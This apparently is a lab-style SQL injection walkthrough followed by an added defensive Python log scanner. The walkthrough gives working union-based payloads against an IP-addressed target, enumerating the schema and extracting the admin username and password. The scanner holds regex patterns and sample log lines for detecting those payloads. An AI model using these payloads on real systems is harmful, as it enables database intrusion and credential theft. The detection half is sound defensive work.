Query the relevant information (always read the result at the echo point, i.e. the union column whose value is displayed back in the page!)
Query the database name
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,database()
Query the database version (MySQL > 5.0: information_schema only exists from version 5.0 onward; it stores database names, table names, column data types, access privileges, etc.)
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,version()
Query the table name
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
Query the column names
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
This shows that the admin table has three columns: id, username, password
Query the column contents
Construct
?id=1 and 1=2 union select 1,username from admin limit 0,1
Construct
?id=1 and 1=2 union select 1,password from admin limit 1,1
limit 1,1 returns nothing at the echo point, which means there is only one user
Construct
?id=1 and 1=2 union select 1,password from admin limit 0,1
This yields the administrator account and password.
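From the defender's side, every request in the walkthrough above leaves a recognisable trace in the web server's access log: an `and 1=2` guard, `union select`, probes of `database()` and `information_schema`, and a run of `limit N,1` requests from one source as rows are pulled one at a time. The following Python script is an added example, not part of the original writeup; it parses constructed access-log lines (the log format, IPs and timestamps are invented) whose query strings mirror the payload shapes shown above, URL-decodes them, tags each request with the signals it matches, and reports sources that issued repeated union-based requests.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page). The query
# strings follow the shapes used in the walkthrough, percent- and plus-encoded
# as a browser or proxy would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%20and%201=2%20union%20select%201,database() HTTP/1.1" 200 530
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1 HTTP/1.1" 200 540
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1+and+1%3D2+union+select+1,password+from+admin+limit+0,1 HTTP/1.1" 200 545
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512
"""

# Common/combined log format: ip ident user [timestamp] "METHOD target proto" status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Each signal is a regex applied to the URL-decoded, lower-cased query string.
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "always_false_guard": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b"),
    "schema_probe": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "builtin_probe": re.compile(r"\b(?:database|version|user)\s*\(\s*\)"),
    "row_enumeration": re.compile(r"\blimit\s+\d+\s*,\s*\d+\b"),
}


def decode_query(target: str) -> str:
    """Return the query string of a request target, URL-decoded and lower-cased."""
    query = target.split("?", 1)[1] if "?" in target else ""
    # Decode up to twice so double-encoded (%2520-style) keywords are not missed.
    for _ in range(2):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query.lower()


def classify(target: str) -> list:
    """Names of the signals matched by one request target, in SIGNALS order."""
    query = decode_query(target)
    return [name for name, rx in SIGNALS.items() if rx.search(query)]


def scan_log(text: str) -> list:
    """Parse log lines and return one finding per request that matches a signal."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        hits = classify(m["target"])
        if hits:
            findings.append(
                {"ip": m["ip"], "ts": m["ts"], "path": m["target"], "signals": hits}
            )
    return findings


def enumeration_sources(findings: list, threshold: int = 2) -> dict:
    """IPs that sent at least `threshold` union-select requests. Pulling rows
    with `limit N,1` produces exactly this one-request-per-row shape."""
    counts = Counter(f["ip"] for f in findings if "union_select" in f["signals"])
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f["ts"], f["ip"], ",".join(f["signals"]), f["path"])
    print("repeat union sources:", enumeration_sources(results))
```

Decoding before matching matters: the same payload arrives as `%20`, `+` or `%3D` depending on the client, and a rule that looks only at the raw line misses most of them. The per-source count is the useful alert, since a single `union select` may be noise from a scanner, while several from one address within seconds is the row-by-row extraction the walkthrough performs.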